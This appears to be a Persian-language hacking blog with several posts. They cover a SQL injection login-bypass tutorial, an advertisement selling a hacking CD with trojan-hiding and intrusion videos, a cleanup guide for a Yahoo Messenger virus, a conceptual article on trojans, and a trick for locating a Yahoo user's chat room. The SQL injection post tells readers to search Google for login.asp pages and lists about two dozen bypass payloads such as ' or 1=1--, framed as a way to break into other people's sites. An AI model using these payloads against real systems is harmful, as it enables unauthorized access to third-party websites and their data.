عشق اینترنت

 دوستان عزیز سلام

خوب این بار براتون یه مطلب در مورد هک اماده کردم

چون حجم مطلب زیاد بود در ادامه مطلب قرار دادم

برای دیدن آموزش بر روی ادامه مطلب کلیک کنید .

نظر !!!!

ادامه مطلب

ارسال به

دوستان عزیز سلام . امیدوارم حالتون خوب باشه

این بار براتون نحوه عمل کرد دیوار اتشی رو اموزش میدم امیدوارم لذت ببرید

برای دیدن مطلب بر روی ادامه مطلب کلیک کنید

ادامه مطلب

ارسال به

 دوستان عزیز سلام . امروز یه اموزش با حال هک براتون دارم .

یكی از نقطه ضعف های Sql رشته ی ساختار ان میباشد كه همیشه آسیب پذیر بوده و مورد حمله قرار میگیرد این آموزش به شما روشهایی یاد میده كه بتوانید این ساختار را مورد حمله قرار بدهید .
حالا میتوانید در گوگل عبارت زیر را سرچ كنید :
login.asp
در جواب برای شما تقریبا 17 هزار مورد پیدا میكند . حالا به لینك یافته ها دقت كنید مثلا چنین خواهید یافت :
www.site.com/login.asp
یا چیزهایی مشابه این . این قسمتها را میتوانیم مورد حمله قرار دهیم . حالا به ساده ترین قسمت رسیدیم
كافی است برای رد كردن این مانع بصورت زیر عمل كنید
بجای یوزر نیم Admin را بزنید و بجای پسورد از این عبارت استفاده كنید
or 1=1—
شاید تا حالا كه مقاله را خوانده اید تعجب كرده اید كه این امر چگونه امكان پذیر است . در تمامی این عملیات اطلاعات لاگین شما بصورت Query فرستاده میشود . اگر اطلاعات درست باشد شما اجازه ی ورود خواهید یافت وگرنه با پیغام Login Failed مواجه خواهید شد . وقتی شما ارسالی را با یوزر ادمین و با پسورد 1234 را ارسال میكنید از حالت اول به حالت دوم تغییر پیدا میكند :
حالت اول :
"select *from table1 where login=""&log&""and password=""pwd&"" '
حالت دوم‌:

"select *from table1 where login="Admin"and password="1234" '
حالا با استفاده از این تركیبات شما میتوانید با توجه به ساختار اس كیو ال برای آن پسورد هایی ارسال كنید كه در صورت قرار گرفتن در این پسورد مورد قبول قرار گیرد و در واقع با استفاده از نقطه ضعف Query Stringsبه آن حمله كند . این تركیبات كه با توجه به ساختار اس كیو ال نوشته شده به این صورت میباشد نمونه هایی از آن مشاهده میكنید :
admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

" or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi" or ("a"="a

همانطور كه مشاهده كردید این روش یك روش ساده اما ابتكاری مباشد كه احتیاج به تفكر دقیق دارد البته ساختار ها متفاوت میباشند و شما میتوانید همه ی این تركیبات بالا را به عنوان پسورد امتحان كنید و حتما به جواب خواهید رسید .

موفق باشـــید!

علی یارتون

ارسال به

دوستان عزیز سلام . امیدوارم حاله همتون خوب باشه .

این بار براتون یه سی دی اموزش هک که از بهترین و برگزیده ترین مطالب و اموزش های سایت های بزرگ هکینک ایرانی و خارجی هست درست کردم که اونو برای فروش میزارم .

محتویات سی دی :

 -15 فیلم اموزش هک کردن سایت ( جدیدترین باگ ها و اکسپلویتها ) و فیلم های اموزش دیگر از قبل مخفی کردن تروجان و ویروس از دست انتی ویروس ها و چند فیلم در مورد نفوذ به سیستم قربانی .

- برترین نرم افزارهای هکینگ سایت و ایدی و نفوذ و .....

- اموزش تصوری اسکن کردن پورت و ای پی و ...

- کاملترین و برترین مقالات PDF   که اگه همشون رو بخونین بهتون قول میدیم که یه هکر واقعی بشین ( البته من هنوز همشون رو نخوندم) که کاملترین اونها دارای 1128 صفحه است و این فقط یکی از اوناست و کتابهایی دیگر در مورد اموزش هکینگ از روش های مختلف و.... ( باور کنین هیچ جا چنین مجموعه کاملی گیر نمیارین )

خوب قیمت این محصول هم خدایش عالیه و با پول پست 7000 تومان است در صورتی که مثلا شما یه سی دی اموزش هک میخرین 4000 هزار تومان که فقط هکینگ ای دی رو اموزش داده . اما این اموزش ها باور کنین که از 15000 تومان هم بیشتر می ارزه مخصوصآ فیلمهای اموزشیش. در ضمن ۵ نفر اولی که این سیدی رو خریداری کنن به عنوان جایزه ۲ فیلم بدون سانسور و با زیر نویس فارسی به عنوان و به صورت رایگان دریافت می کنن

نحوه خرید:

شما مبلغ 7000 تومان را به شماره حساب ""7007720"" و به نام """ علی اسلامی """ در بانک ملی یزد شعبه بلوار جمهوری اسلامی  واریز کنید و شماره فیش و نام پرداخت کننده و هنچنین ادرس منزل  وکد پستی خود را به ایمیل من  (alihellboy_hack@yahoo.com) ارسال کنید و حداکثر تا 4 روز بعد سی دی را درب منزل خود تحویل بگیرید

ارسال به

دوستان عزیز سلام . ببخشید که یه مدت نتونستم پست بدم . امروز یه خبر براتون دارم

یکی از قوی ترین و شایعرین ویروس/تروجان هایی که اخیرآ در حال گسترش بین کاربران استفاده کننده از یاهو مسنجر می باشد ویروس "Exploit.JS.ADODB.Stream.e" است.

در صورتیکه کامپیوتر شما نیز به این ویروس آلوده شده باشد بدون آنکه متوجه شوید به لیست دوستانتان پیغامهایی مبنی بر بازدید از سایت nsl-school.org ارسال می شود. بدین ترتیب در صورت کلیک بر روی این لینکها دوستان شما نیز آلوده خواهند شد.

هنوز مشخص نیست سازنده این ویروس چه کسی است و این احتمال داده می شود که ویروس مذکور به سرقت اطلاعات و رمز های شخصی افراد می پردازد. در صورتیکه شما و یا یکی از دوستانتان به این ویروس آلوده شده شده اید روش زیر مناسبترین گزینه برای از بین بردن آن است:

پیام و لینک هایی که این ویروس ارسال می کند چیست ؟!

در متن تمامی این پیغام ها لینکی به سایت Nsl-school.org داده شده است که در صورت کلیک کردن بر روی آن کامپیوتر شما آلوده می شود.

در صورتیکه به ویروس آلوده شوید چه مشکلاتی پیش خواهد آمد ؟!

1- در ابتدا ویروس صفحه شخصی اینترنت اکسپلورر (Default IE Page) را به سایت nsl-school.org تغییر می دهد. در این صورت به هیچ طریق امکان عوض کردن آن وجود نخواهد داشت. بعد از هر باز باز کردن یک صفحه وب جدید، ویروس مجددآ خود را در سیستم شما کپی می کند.

2- گزینه های Task Manager و Reg Edit در کامپیوتر غیر فعال می شوند تا شخص نتواند از این طریق فعالیت ویروس را مشاهده و یا از بین ببرد.

3- فایل هایی با نامهای svhost.exe , svhost32.exe , internat.exe در کامپیوتر ایجاد می شوند. (برای اطمینان پوشه های windows و temp را بررسی کنید.)

4- ویروس بدون آنکه متوجه شوید پیغام هایی را به لیست دوستان شما (Yahoo Messenger ID List) ارسال می کند.

چگونه ویروس را از کامپیوتر خود پاک کنیم ؟!

1- مرورگر اینترنت اکسپلورر را ببندید. از یاهو مسنجر خارج شوید. اتصال اینترنت را قطع کنید.

2- جهت فعال کردن Reg Edit دکمه های Start > Run را کلیک کنید و در کادر مربوطه عیناً عبارت زیر را وارد کنید. و در نهایت کلید Enetr را کلیک کنید.

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

3- جهت فعال کردن Task Manager دکمه های Start > Run را کلیک کنید و در کادر مربوطه عیناً عبارت زیر را وارد کنید. و در نهایت کلید Enetr را کلیک کنید.

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f

4- اکنون نیاز به آن داریم که صفحه نخست مرورگر خود را به حالت قبل برگردانیم. دکمه های Start > Run را کلیک کنید و در کادر مربوطه عبارت Regedit را وارد کنید. و در نهایت کلید Enetr را کلیک کنید. میسر های زیر را با دقت پیدا نموده و در آنها وارد شوید اکنون تمام لینک هایی را که به سایت ویروس یعنی (nsl-school.org) وجود دارند تغییر داده و بجای آنها سایت مورد نظر خود مثلاً گوگل (google.com) را وارد کنید.

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main

HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main

HKEY_USERS\Default\Software\Microsoft\Internet Explorer\Main

5- اکنون نیاز به آن داریم که فعالیت ویروس را متوقف کنیم. دکمه های Ctrl + Alt + Del را فشار دهید. در لیست برنامه های فعال تمامی فایل های svhost32.exe را یافته و آنها را End Task نمایید.

6- از طریق جستجو و یا وارد شدن به پوشه های Windows و temp فایل های svhost32.exe و svhost.exe را یافته و حذف نمایید.

7- مجددآ به قسمت Start menu > Run > Regedit باز گردید. از طریق جستجو به دنبال عبارت svhost بگردید و تمام موارد یافت شده را حذف نمایید.

8- کامپیوتر خود را ریست نمایید. امیدواریم دیگر خبری از این ویروس نباشد.

ارسال به

سلام دوستان عزیز همنطور که قول داده بودم و گفته بودم اموزش هک مقدماتی رو میزارم امروز میخوام به قولم عمل کنم و این کار رو بکنم تمام مطالبی که من با موضوع ؛؛ اموزش هک مقدماتی ؛؛ به صورت فصل فصل برای شما میزارم توسط یکی از بهترین هکرای ایران ( از نظر من ) اقای صمدی نوشته شده و هر جای دیگه که شما این مطالب رو دیدید شک نکنید که مریوط به ایشون هست . خوب زیادی حرف نمیزنم .

چون یه کم زیاد بود گذاشتم تو ادامه مطلب

بر روی ادامه مطلب کلیک کنید

ادامه مطلب

ارسال به

سلام دوستان عزیز . امروز میخوام یه سایت بسیار جالب در ضمینه هکینگ براتون معرفی کنم .

در این سایت بهترین فیلمهای اموزشی و برنامه ها و مقالات هک ارائه میشه . حتما یه سری بزنین

http://www.scary-boys.com/

ارسال به

سلام دوستان عزیز . امروز براتون یه ترفند با حال و امتحان شده دارم . اما شما که نظر نمی دین که ما کار خودمون رو به دلگرمی انجام بدیم . خواهشا نظرات خودتون رو عنوان کنید.

اینم ترفند:

در ورژنهای قبلی یاهو مسنجر امکانی وجود داشت که با استفاده از آن میتوانستید بفمهمید که دوست شما در کدام یک از چت روم های یاهو حاضر است. این قابلیت در ورژنهای بعدی از یاهو مسنجر حذف شد. همینک قصد داریم یک ترفند جدید را به شما معرفی کنم که با استفاده از آن میتوانید به سادگی پی ببرید که ID مورد نظر شما در سایت یاهو در کدام روم مشغول چت کردن است.
بدین منظور:
وارد یاهو مسنجر شوید و به آیدی خودتان لوگین کنید.
سپس از منوی بالا وارد Messenger شده و از قسمت Yahoo Chat بر روی Join a Room کلیک کنید.
اکنون به انتخاب خودتون به یکی از روم های یاهو وارد شوید. هر کدام که دوست داشتید.
پس از ورود به روم انتخابی کافی است دستور زیر را در قسمت Type Massage وارد کنید:

goto ID/

در دستور فوق به جای عبارت ID باید آیدی مورد نظرتان را بنویسید.
اکنون Enter بزنید.
حالا منتظر بمانید تا به طور اتوماتیک به رومی که دوستتان درش هست وارد شوید.

به عنوان مثال ما قصد داریم بفهمیم دوستمان که آیدی او xxx است در کدام یک از روم های مشغول چت کردن است.
برای این کار پس از وارد شدن به یکی از روم های یاهو دستور زیر را وارد کرده و Enter میزنیم:

goto xxx/

اکنون به طور اتوماتیک وارد رومی میشویم که xxx در آن حاضر است.

به این نکته نیز دقت کنید که ممکن است پس از وارد نمودن دستور مورد نظر با پیغام خطای !User Is Not Singed in Chat روبرو شویم ؛
این پیغام بدین معنا است که:
آیدی که وارد کرده اید اصلا در هیچ یک از چت روم ها حاضر نیست!
یا
آیدی مورد نظر شما در چت رومی هست که ظرفیت آن تکمیل است و امکان ورود شما وجود ندارد ، بهتر است مجدد سعی کنید.

امیدوارم از ترفند امروز خشتون اومده باشه .

نظر فراموش نشه.

ارسال به

سلام دوستان عزیز . امروز میخوام یه مقاله در مورد اسب های تراوا براتون بزارم. امیدوارم خشتون بیاد.

اسب تروا برنامه ای است که ادعا می کند برنامه ای مفید و خواستنی است اما در حقیقت هدف دیگری دارد. اسب تروا ممکن است در قالب یک بازی، یک محافظ نمایشگر، یک آلبوم عکس و یا حتی یک ویروس کش به شما فرستاده شود، اما درست هنگامی که شما مشغول لذت بردن از تماشای آن هستید، رمزهای عبور شما و فایلهایتان را به کسی ارسال کند و یا حتی به آن فرد امکان کنترل سیستم شما و پاک کردن فایلهایتان را بدهد!

اسبهای تروا را به طور کلی می توان به دو گروه اصلی زیر تقسیم کرد:

1- Backdoor Trojans (تروجنهای ایجاد کننده در پشتی): یک اسب تروا از این نوع به طور کلی از یک فایل میزبان (server) و یک فایل ارباب رجوع (client) تشکیل می شود که فرد نفوذگر با چسباندن فایل میزبان (سربازها) به یک فایل مورد علاقه شما (اسب) شما را به سمت اجرای میزبان روی سیستم خود سوق می دهد. این فایل پس از اجرا با باز کردن یک پورت روی سیستم آلوده به فرد نفوذگر اجازه می دهد که با استفاده از ارباب رجوع (client) تروجن به میزبان متصل شود و از این راه کنترل سیستم شما را بر عهده بگیرد. از میان این تروجنها می توان به Sub7، NetBus، Gift و bf/gf اشاره کرد.

2- اسبهای تروای ارسال کننده رمز: چنین تروجنی معمولاً فقط شامل فایلی است که باید پس از چسبانیده شدن به یک فایل دلخواه برای سیستم هدف ارسال شود. این تروجن پس از اجرا، رمزهای عبور و برخی اطلاعات دیگر مانند آدرس IP سیستم قربانی را به فرد نفوذگر از طریق ایمیل (یا از طریق مسنجرها) ارسال می کند. از معروفترین تروجنهای این دسته می توان به Ajan و Barok اشاره کرد.

اگرچه معمولاً گفته می شود تفاوت اساسی تروجنها با ویروسها در این است که یک اسب تروا بر خلاف ویروسها و کرمها توانایی تولد مثل ندارد یعنی سایر فایلهای شما را آلوده نمی کند و خود را به رایانه های دیگر ارسال نمی کند؛ تروجنهایی که خصوصیات ویروسی داشته باشند هم ساخته شده اند. مثلاً Kuang2v تروجنی است که با آلوده کردن فایلهای اجرایی خود را پخش می کند و تمام خصوصیات دیگر تروجنها مانند امکان اتصال از ارباب رجوع ((Client به میزبان (Server) را هم دارا می باشد.

در یک نگاه دقیقتر به مراحل آلوده سازی یک اسب تروا، مراحل زیر را داریم:

1- اسب تروا (همراه با برنامه مفیدی که به آن متصل شده است) روی رایانه هدف، اجرا می شود.

2- اسب تروا یک نسخه از خود را جایی روی هارددیسک کپی می کند (معمولاً در یکی از شاخه های windows، system یا system32). برخی از تروجنها در این مرحله نسخه اصلی خود را از روی هارددیسک پاک می کنند و فقط نسخه کپی را باقی می گذارند.

3- اسب تروا با دستکاری Registry (یا سایر روشهای مناسب) ترتیبی می دهد که با هر بار اجرای ویندوز، نسخه کپی تروجن نیز اجرا شود.

4- اسب تروا منتظر برقراری ارتباط با اینترنت می ماند و پس از برقراری ارتباط وظیفه خود را انجام می دهد. مثلاً رمزهای عبور فرد قربانی را به فرد نفوذگر ارسال می کند یا با باز کردن پورتی روی سیستم آلوده امکان کنترل آن از راه دور توسط فرد نفوذگر را فراهم می کند.

ذکر این نکته هم لازم است که برخلاف آنچه ممکن است در ابتدا به نظر برسد، نوشتن یک تروجن معمولی کاری بسیار ساده است و هر فردی که کمی با زبانهای برنامه نویسی ویندوز آشنا باشد می تواند با استفاده از کنترلWinsock به راحتی یک تروجن ساده بنویسد.

نوشته شده توسط : 50cent

ارسال به

سلام دوستان عزیز. از اینکه نتونستم چند روزی برای شما مطلب بفرستم معذرت می خوام .

اما امروز می خوام آموزش عوض کردن Ip  رو بدم .

برای دیدن آموزش بر روی ادامه مطلب کلیک کنید.

موفق باشید.

ادامه مطلب

ارسال به